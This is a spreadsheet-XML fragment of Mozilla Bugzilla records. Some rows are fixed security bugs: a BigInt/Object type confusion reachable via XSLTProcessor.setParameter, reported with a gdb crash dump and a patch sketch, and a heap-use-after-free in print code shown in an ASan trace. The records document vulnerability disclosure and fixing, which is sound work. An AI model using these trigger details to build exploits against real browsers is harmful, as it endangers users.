      <c r="P1931" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q1931" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1931" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1931" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1931" t="n">
        <v>1</v>
      </c>
      <c r="U1931" t="n">
        <v>0</v>
      </c>
      <c r="V1931" t="n">
        <v>28</v>
      </c>
      <c r="W1931" t="inlineStr">
        <is>
          <t>Created attachment 585258
testcase (crashes Firefox when loaded)
###!!! ASSERTION: no self: 'self', file e:/builds/moz2_slave/m-cen-w32-dbg/build/xpcom/reflect/xptcall/src/md/win32/xptcstubs.cpp, line 68</t>
        </is>
      </c>
      <c r="X1931" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" t="n">
        <v>1603055</v>
      </c>
      <c r="B1932" t="inlineStr">
        <is>
          <t>2019-12-11 01:59:57 -0800</t>
        </is>
      </c>
      <c r="C1932" t="inlineStr">
        <is>
          <t>BigInt and Object type confusion vulnerability exploitable via XSLTProcessor setParameter method</t>
        </is>
      </c>
      <c r="D1932" t="inlineStr">
        <is>
          <t>2024-05-30 10:05:23 -0700</t>
        </is>
      </c>
      <c r="E1932" t="n">
        <v>1</v>
      </c>
      <c r="F1932" t="n">
        <v>1</v>
      </c>
      <c r="G1932" t="n">
        <v>3</v>
      </c>
      <c r="H1932" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1932" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1932" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1932" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1932" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1932" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1932" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1932" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main72+][adv-esr68.4+][sec-survey]</t>
        </is>
      </c>
      <c r="Q1932" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1932" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1932" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T1932" t="n">
        <v>1</v>
      </c>
      <c r="U1932" t="n">
        <v>0</v>
      </c>
      <c r="V1932" t="n">
        <v>28</v>
      </c>
      <c r="W1932" t="inlineStr">
        <is>
          <t>Created attachment 9115128
pocs.zip
Hello,
There is a  Type confusion between BigInt and Object Vulnerability in Firefox.
Tested Platforms:
1)Ubuntu 64-bit 16.04.3 (Memory 8G)+ firefox release version nightly 71.0 (64-bit) 
When using firefox to load the poc.html, it manifests itself in the form of the following crash:
---cut---
[----------------------------------registers-----------------------------------]
RAX: 0x7ffc8dd921f0 --&gt; 0x2ac4b96192040 
RBX: 0xac3e674300ed4900 
RCX: 0xac3e674300ed4900 
RDX: 0x7ffc8dd9208c --&gt; 0x8dd921f000007ffc 
RSI: 0x7ffc8dd921f0 --&gt; 0x2ac4b96192040 
RDI: 0x2ac4b96192040 
RBP: 0x7ffc8dd91fb0 --&gt; 0x7ffc8dd91fd0 --&gt; 0x7ffc8dd91ff0 --&gt; 0x7ffc8dd92040 --&gt; 0x7ffc8dd920a0 --&gt; 0x7ffc8dd920f0 (--&gt; ...)
RSP: 0x7ffc8dd91fb0 --&gt; 0x7ffc8dd91fd0 --&gt; 0x7ffc8dd91ff0 --&gt; 0x7ffc8dd92040 --&gt; 0x7ffc8dd920a0 --&gt; 0x7ffc8dd920f0 (--&gt; ...)
RIP: 0x7fdb2df3367c (&lt;js::GetObjectClass(JSObject const*)+12&gt;:	mov    rdi,QWORD PTR [rdi])
R8 : 0xac3e674300ed4900 
R9 : 0x0 
R10: 0x7ffc8dd91c08 --&gt; 0x7ffc8dd92410 --&gt; 0x34a50a6004a0 --&gt; 0x2c4b9615d610 --&gt; 0x7fdb39940c70 --&gt; 0x7fdb37415616 (--&gt; ...)
R11: 0xac3e674300ed4900 
R12: 0x8 
R13: 0x7fdb296bc098 --&gt; 0xfff9800000000000 
R14: 0x7fdb2a05c601 --&gt; 0x2560000000b 
R15: 0x1
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fdb2df33671 &lt;js::GetObjectClass(JSObject const*)+1&gt;:	mov    rbp,rsp
   0x7fdb2df33674 &lt;js::GetObjectClass(JSObject const*)+4&gt;:	mov    QWORD PTR [rbp-0x8],rdi
   0x7fdb2df33678 &lt;js::GetObjectClass(JSObject const*)+8&gt;:	mov    rdi,QWORD PTR [rbp-0x8]
=&gt; 0x7fdb2df3367c &lt;js::GetObjectClass(JSObject const*)+12&gt;:	mov    rdi,QWORD PTR [rdi]
   0x7fdb2df3367f &lt;js::GetObjectClass(JSObject const*)+15&gt;:	mov    rax,QWORD PTR [rdi]
   0x7fdb2df33682 &lt;js::GetObjectClass(JSObject const*)+18&gt;:	pop    rbp
   0x7fdb2df33683 &lt;js::GetObjectClass(JSObject const*)+19&gt;:	ret    
   0x7fdb2df33684:	nop    WORD PTR cs:[rax+rax*1+0x0]
[------------------------------------stack-------------------------------------]
0000| 0x7ffc8dd91fb0 --&gt; 0x7ffc8dd91fd0 --&gt; 0x7ffc8dd91ff0 --&gt; 0x7ffc8dd92040 --&gt; 0x7ffc8dd920a0 --&gt; 0x7ffc8dd920f0 (--&gt; ...)
0008| 0x7ffc8dd91fb8 --&gt; 0x7fdb2df56165 (&lt;js::IsProxy(JSObject const*)+21&gt;:	mov    rdi,rax)
0016| 0x7ffc8dd91fc0 --&gt; 0x10000002a1a6c78 
0024| 0x7ffc8dd91fc8 --&gt; 0x2ac4b96192040 
0032| 0x7ffc8dd91fd0 --&gt; 0x7ffc8dd91ff0 --&gt; 0x7ffc8dd92040 --&gt; 0x7ffc8dd920a0 --&gt; 0x7ffc8dd920f0 --&gt; 0x7ffc8dd92240 (--&gt; ...)
0040| 0x7ffc8dd91fd8 --&gt; 0x7fdb34b04515 (&lt;JSObject::is&lt;js::ProxyObject&gt;() const+21&gt;:	and    al,0x1)
0048| 0x7ffc8dd91fe0 --&gt; 0x7ffc8dd92208 --&gt; 0xfffcac4b96192040 
0056| 0x7ffc8dd91fe8 --&gt; 0x2ac4b96192040 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007fdb2df3367c in js::GetObjectClass (obj=0x2ac4b96192040) at /home/bo13oy/Desktop/firefox_build/mozilla-release/objdir-frontend/dist/include/jsfriendapi.h:613
613	  return reinterpret_cast&lt;const shadow::Object*&gt;(obj)-&gt;group-&gt;clasp;
gdb-peda$ 
gdb-peda$ bt
#0  0x00007fdb2df3367c in js::GetObjectClass (obj=0x2ac4b96192040) at /home/bo13oy/Desktop/firefox_build/mozilla-release/objdir-frontend/dist/include/jsfriendapi.h:613
#1  0x00007fdb2df56165 in js::IsProxy (obj=0x2ac4b96192040) at /home/bo13oy/Desktop/firefox_build/mozilla-release/objdir-frontend/dist/include/js/Proxy.h:381
#2  0x00007fdb34b04515 in JSObject::is&lt;js::ProxyObject&gt; (this=0x2ac4b96192040) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/vm/ProxyObject.h:148
#3  0x00007fdb34c7c815 in js::GetBuiltinClass (cx=0x7fdb2a02a000, obj=..., cls=0x7ffc8dd9208c) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/jsfriendapi.cpp:264
#4  0x00007fdb34c3ef0e in IsGivenTypeObject (cx=0x7fdb2a02a000, obj=..., typeClass=@0x7ffc8dd920d4: js::ESClass::Array, isType=0x7ffc8dd921c7)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/jsapi.cpp:3124
#5  0x00007fdb34c3ee85 in JS_IsArrayObject (cx=0x7fdb2a02a000, obj=..., isArray=0x7ffc8dd921c7) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/jsapi.cpp:3134
#6  0x00007fdb2f170d70 in XPCArrayHomogenizer::GetTypeForArray (cx=0x7fdb2a02a000, array=..., length=0xc, resultType=0x7ffc8dd923d8, resultID=0x7ffc8dd92490)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/xpconnect/src/XPCVariant.cpp:191
#7  0x00007fdb2f170787 in XPCVariant::InitializeData (this=0x7fdb2a1a6c40, cx=0x7fdb2a02a000)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/xpconnect/src/XPCVariant.cpp:336
#8  0x00007fdb2f16fe93 in XPCVariant::newVariant (cx=0x7fdb2a02a000, aJSVal=...) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/xpconnect/src/XPCVariant.cpp:105
#9  0x00007fdb2f1946b1 in nsXPConnect::JSToVariant (this=0x7fdb2b91ed00, ctx=0x7fdb2a02a000, value=..., _retval=0x7ffc8dd92638)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/xpconnect/src/nsXPConnect.cpp:867
#10 0x00007fdb3232bad3 in txMozillaXSLTProcessor::SetParameter (this=0x7fdb29148280, aCx=0x7fdb2a02a000, aNamespaceURI=..., aLocalName=..., aValue=..., aRv=...)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:1114
#11 0x00007fdb30c7f784 in mozilla::dom::XSLTProcessor_Binding::setParameter (cx=0x7fdb2a02a000, obj=..., self=0x7fdb29148280, args=...)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/objdir-frontend/dom/bindings/XSLTProcessorBinding.cpp:246
#12 0x00007fdb310596e8 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt; (
    cx=0x7fdb2a02a000, argc=0x3, vp=0x7ffc8dd93830) at /home/bo13oy/Desktop/firefox_build/mozilla-release/dom/bindings/BindingUtils.cpp:3198
#13 0x00007fdb34b04160 in CallJSNative (cx=0x7fdb2a02a000, 
    native=0x7fdb31059040 &lt;mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt;(JSContext*, unsigned int, JS::Value*)&gt;, reason=js::CallReason::Call, args=...) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/vm/Interpreter.cpp:458
#14 js::InternalCallOrConstruct (cx=0x7fdb2a02a000, args=..., construct=js::NO_CONSTRUCT, reason=js::CallReason::Call)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/vm/Interpreter.cpp:550
#15 0x00007fdb34b04e83 in InternalCall (cx=0x7fdb2a02a000, args=..., reason=js::CallReason::Call)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/vm/Interpreter.cpp:619
#16 0x00007fdb34b04cff in js::CallFromStack (cx=0x7fdb2a02a000, args=...) at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/vm/Interpreter.cpp:623
#17 0x00007fdb355002c1 in js::jit::DoCallFallback (cx=0x7fdb2a02a000, frame=0x7ffc8dd938c8, stub=0x7fdb28846590, argc=0x3, vp=0x7ffc8dd93830, res=...)
    at /home/bo13oy/Desktop/firefox_build/mozilla-release/js/src/jit/BaselineIC.cpp:2938
#18 0x00003d32d56df798 in ?? ()
#19 0x00007ffc8dd98100 in ?? ()
#20 0x00007ffc8dd937f0 in ?? ()
#21 0xfff9800000000000 in ?? ()
#22 0x00007fdb374024c8 in js::jit::vmFunctions () from /home/bo13oy/Desktop/firefox_build/mozilla-release/objdir-frontend/dist/bin/libxul.so
---cut---
Here's a snippet of the method.
-----source code -------
	// static
bool XPCArrayHomogenizer::GetTypeForArray(JSContext* cx, HandleObject array,
                                          uint32_t length,
                                          nsXPTType* resultType,
                                          nsID* resultID) {
  Type state = tUnk;
  Type type;
  RootedValue val(cx);
  RootedObject jsobj(cx);
  for (uint32_t i = 0; i &lt; length; i++) {
    if (!JS_GetElement(cx, array, i, &amp;val)) {
      return false;
    }
    if (val.isInt32()) {
      type = tInt;
    } else if (val.isDouble()) {
      type = tDbl;
    } else if (val.isBoolean()) {
      type = tBool;
    }
    else if (val.isUndefined() || val.isSymbol()) {
      state = tVar;
      break;
    } else if (val.isNull()) {
      type = tNull;
    } else if (val.isString()) {
      type = tStr;
    }
/***************** add patch  sample code  start ********************/
    else if(val.isBigInt()) //patch 
    {
		type = tBigInt; 
    }  
/*****************add patch  sample code  end ********************/
    else {
      MOZ_ASSERT(val.isObject(), "invalid type of jsval!");
      jsobj = &amp;val.toObject();
      bool isArray;
      if (!JS_IsArrayObject(cx, jsobj, &amp;isArray)) {
        return false;
      }
      if (isArray) {
        type = tArr;
      } else if (xpc::JSValue2ID(cx, val)) {
        type = tID;
      } else {
        type = tISup;
      }
    }
......
-----source code -------
Thank you,
bo13oy
Qihoo 360 Vulcan Team.</t>
        </is>
      </c>
      <c r="X1932" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" t="n">
        <v>657180</v>
      </c>
      <c r="B1933" t="inlineStr">
        <is>
          <t>2011-05-14 18:22:10 -0700</t>
        </is>
      </c>
      <c r="C1933" t="inlineStr">
        <is>
          <t>add Mozilla Engineering Newsletter blog to Planet Mozilla</t>
        </is>
      </c>
      <c r="D1933" t="inlineStr">
        <is>
          <t>2013-12-27 14:36:14 -0800</t>
        </is>
      </c>
      <c r="E1933" t="n">
        <v>1</v>
      </c>
      <c r="F1933" t="n">
        <v>1</v>
      </c>
      <c r="G1933" t="n">
        <v>5</v>
      </c>
      <c r="H1933" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1933" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J1933" t="inlineStr">
        <is>
          <t>planet.mozilla.org</t>
        </is>
      </c>
      <c r="K1933" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1933" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1933" t="inlineStr"/>
      <c r="Q1933" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1933" t="n">
        <v>1</v>
      </c>
      <c r="U1933" t="n">
        <v>0</v>
      </c>
      <c r="V1933" t="n">
        <v>7</v>
      </c>
      <c r="W1933" t="inlineStr">
        <is>
          <t>Please add the Mozilla Engineering Newsletter blog to Planet Mozilla so that people can read my crazy-awesome newsletter without all that other crap in dev.planning :D 
Plus, the Web is way more hip than NNTP!
http://blog.mozilla.com/engineeringnews/?feed=rss2
"The Web version of the Mozilla Weekly Engineering Newsletter, your source for all of the week's most important Mozilla engineering news and information.
The original version of this Newsletter can be found mixed in with lots of other Mozilla developer planning stuff at the &lt;a href="http://www.mozilla.org/about/forums/#dev-planning"&gt;mozilla.dev.planning&lt;/a&gt; forum."</t>
        </is>
      </c>
      <c r="X1933" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" t="n">
        <v>1243427</v>
      </c>
      <c r="B1934" t="inlineStr">
        <is>
          <t>2016-01-27 09:17:49 -0800</t>
        </is>
      </c>
      <c r="C1934" t="inlineStr">
        <is>
          <t>Remove submission for China and China queue</t>
        </is>
      </c>
      <c r="D1934" t="inlineStr">
        <is>
          <t>2016-02-08 05:30:46 -0800</t>
        </is>
      </c>
      <c r="E1934" t="n">
        <v>1</v>
      </c>
      <c r="F1934" t="n">
        <v>1</v>
      </c>
      <c r="G1934" t="n">
        <v>6</v>
      </c>
      <c r="H1934" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1934" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1934" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K1934" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1934" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1934" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1934" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1934" t="inlineStr"/>
      <c r="Q1934" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1934" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1934" t="inlineStr">
        <is>
          <t>2016-02-09</t>
        </is>
      </c>
      <c r="T1934" t="n">
        <v>1</v>
      </c>
      <c r="U1934" t="n">
        <v>0</v>
      </c>
      <c r="V1934" t="n">
        <v>3</v>
      </c>
      <c r="W1934" t="inlineStr">
        <is>
          <t>Remove China as a country you can submit for, and special China queue.</t>
        </is>
      </c>
      <c r="X1934" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" t="n">
        <v>821991</v>
      </c>
      <c r="B1935" t="inlineStr">
        <is>
          <t>2012-12-15 05:29:52 -0800</t>
        </is>
      </c>
      <c r="C1935" t="inlineStr">
        <is>
          <t>[FIX] Heap-use-after-free in nsPrintEngine::CommonPrint</t>
        </is>
      </c>
      <c r="D1935" t="inlineStr">
        <is>
          <t>2024-05-30 07:52:47 -0700</t>
        </is>
      </c>
      <c r="E1935" t="n">
        <v>1</v>
      </c>
      <c r="F1935" t="n">
        <v>1</v>
      </c>
      <c r="G1935" t="n">
        <v>3</v>
      </c>
      <c r="H1935" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1935" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1935" t="inlineStr">
        <is>
          <t>Printing: Setup</t>
        </is>
      </c>
      <c r="K1935" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1935" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1935" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1935" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1935" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1935" t="inlineStr">
        <is>
          <t>[asan][adv-main19+] req's user interaction</t>
        </is>
      </c>
      <c r="Q1935" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1935" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1935" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1935" t="n">
        <v>1</v>
      </c>
      <c r="U1935" t="n">
        <v>0</v>
      </c>
      <c r="V1935" t="n">
        <v>15</v>
      </c>
      <c r="W1935" t="inlineStr">
        <is>
          <t>Created attachment 692584
Testcase
Install FuzzPriv extension to help in invoking print. https://www.squarefree.com/extensions/domFuzzLite3.xpi
Load testcase, wait like 10 sec and then press Escape once or twice.
DOMFuzzHelper created
DOMFuzzHelper created
DOMFuzzHelper created
DOMFuzzHelper created
Printing to: /tmp/j1/fuzzout.pdf
DOMFuzzHelper created
Printing to: /tmp/j1/fuzzout.pdf
DOMFuzzHelper created
Printing to: /tmp/j1/fuzzout.pdf
DOMFuzzHelper created
Printing to: /tmp/j1/fuzzout.pdf
DOMFuzzHelper created
Printing to: /tmp/j1/fuzzout.pdf
=================================================================
==12857== ERROR: AddressSanitizer: heap-use-after-free on address 0x7f1b334eae80 at pc 0x7f1b5125a230 bp 0x7fff0a62af30 sp 0x7fff0a62af28
READ of size 8 at 0x7f1b334eae80 thread T0
    #0 0x7f1b5125a22f in nsPrintEngine::CommonPrint(bool, nsIPrintSettings*, nsIWebProgressListener*, nsIDOMDocument*) src/layout/printing/nsPrintEngine.cpp:427
    #1 0x7f1b4f94a398 in nsDocumentViewer::Print(nsIPrintSettings*, nsIWebProgressListener*) src/layout/base/nsDocumentViewer.cpp:3666
    #2 0x7f1b52a9f836 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #3 0x7f1b5181ba43 in Invoke src/js/xpconnect/src/XPCWrappedNative.cpp:3081
    #4 0x7f1b5181ba43 in CallMethodHelper src/js/xpconnect/src/XPCWrappedNative.cpp:2415
    #5 0x7f1b5181ba43 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) src/js/xpconnect/src/XPCWrappedNative.cpp:2381
    #6 0x7f1b51830018 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1488
    #7 0x7f1b53da19dd in native src/js/src/jscntxtinlines.h:372
    #8 0x7f1b53da19dd in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:389
    #9 0x7f1b53d91dd1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2348
    #10 0x7f1b53d7d8ee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:346
    #11 0x7f1b53da18d8 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:404
    #12 0x7f1b53da2792 in Invoke src/js/src/jsinterp.h:112
    #13 0x7f1b53da2792 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:437
    #14 0x7f1b53c56e27 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) src/js/src/jsapi.cpp:5791
    #15 0x7f1b51807285 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1432
    #16 0x7f1b517f610d in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:581
    #17 0x7f1b52aa09ea in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #18 0x7f1b52a9fa42 in SharedStub
    #19 0x7f1b52a5fb5f in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
    #20 0x7f1b52997522 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:237
    #21 0x7f1b51bb0966 in nsXULWindow::ShowModal() src/xpfe/appshell/src/nsXULWindow.cpp:366
    #22 0x7f1b51b0ad3a in nsWindowWatcher::OpenWindowInternal(nsIDOMWindow*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:1072
    #23 0x7f1b51b03da2 in nsWindowWatcher::OpenWindow(nsIDOMWindow*, char const*, char const*, char const*, nsISupports*, nsIDOMWindow**) src/embedding/components/windowwatcher/src/nsWindowWatcher.cpp:404
    #24 0x7f1b52a9f836 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #25 0x7f1b5181ba43 in Invoke src/js/xpconnect/src/XPCWrappedNative.cpp:3081
    #26 0x7f1b5181ba43 in CallMethodHelper src/js/xpconnect/src/XPCWrappedNative.cpp:2415
    #27 0x7f1b5181ba43 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) src/js/xpconnect/src/XPCWrappedNative.cpp:2381
    #28 0x7f1b51830018 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1488
    #29 0x7f1b53da19dd in native src/js/src/jscntxtinlines.h:372
    #30 0x7f1b53da19dd in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:389
    #31 0x7f1b53d91dd1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2348
    #32 0x7f1b53d7d8ee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:346
    #33 0x7f1b53da18d8 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:404
    #34 0x7f1b53da2792 in Invoke src/js/src/jsinterp.h:112
    #35 0x7f1b53da2792 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:437
    #36 0x7f1b53c56e27 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) src/js/src/jsapi.cpp:5791
    #37 0x7f1b51807285 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1432
    #38 0x7f1b517f610d in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:581
    #39 0x7f1b52aa09ea in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #40 0x7f1b52a9fa42 in SharedStub
    #41 0x7f1b5125e6e2 in nsPrintEngine::ShowPrintErrorDialog(tag_nsresult, bool) src/layout/printing/nsPrintEngine.cpp:1632
    #42 0x7f1b5125a18d in nsPrintEngine::CommonPrint(bool, nsIPrintSettings*, nsIWebProgressListener*, nsIDOMDocument*) src/layout/printing/nsPrintEngine.cpp:426
    #43 0x7f1b4f94a398 in nsDocumentViewer::Print(nsIPrintSettings*, nsIWebProgressListener*) src/layout/base/nsDocumentViewer.cpp:3666
    #44 0x7f1b52a9f836 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #45 0x7f1b5181ba43 in Invoke src/js/xpconnect/src/XPCWrappedNative.cpp:3081
    #46 0x7f1b5181ba43 in CallMethodHelper src/js/xpconnect/src/XPCWrappedNative.cpp:2415
    #47 0x7f1b5181ba43 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) src/js/xpconnect/src/XPCWrappedNative.cpp:2381
    #48 0x7f1b51830018 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1488
    #49 0x7f1b53da19dd in native src/js/src/jscntxtinlines.h:372
    #50 0x7f1b53da19dd in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:389
    #51 0x7f1b53d91dd1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2348
    #52 0x7f1b53d7d8ee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:346
    #53 0x7f1b53da18d8 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:404
    #54 0x7f1b53da2792 in Invoke src/js/src/jsinterp.h:112
    #55 0x7f1b53da2792 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) src/js/src/jsinterp.cpp:437
    #56 0x7f1b53c56e27 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) src/js/src/jsapi.cpp:5791
    #57 0x7f1b51807285 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJSClass.cpp:1432
    #58 0x7f1b517f610d in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) src/js/xpconnect/src/XPCWrappedJS.cpp:581
    #59 0x7f1b52aa09ea in PrepareAndDispatch src/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:121
    #60 0x7f1b52a9fa42 in SharedStub
    #61 0x7f1b52a5fb5f in nsThread::ProcessNextEvent(bool, bool*) src/xpcom/threads/nsThread.cpp:627
    #62 0x7f1b52997522 in NS_ProcessNextEvent_P(nsIThread*, bool) src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:237
    #63 0x7f1b52480b9c in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) src/ipc/glue/MessagePump.cpp:82
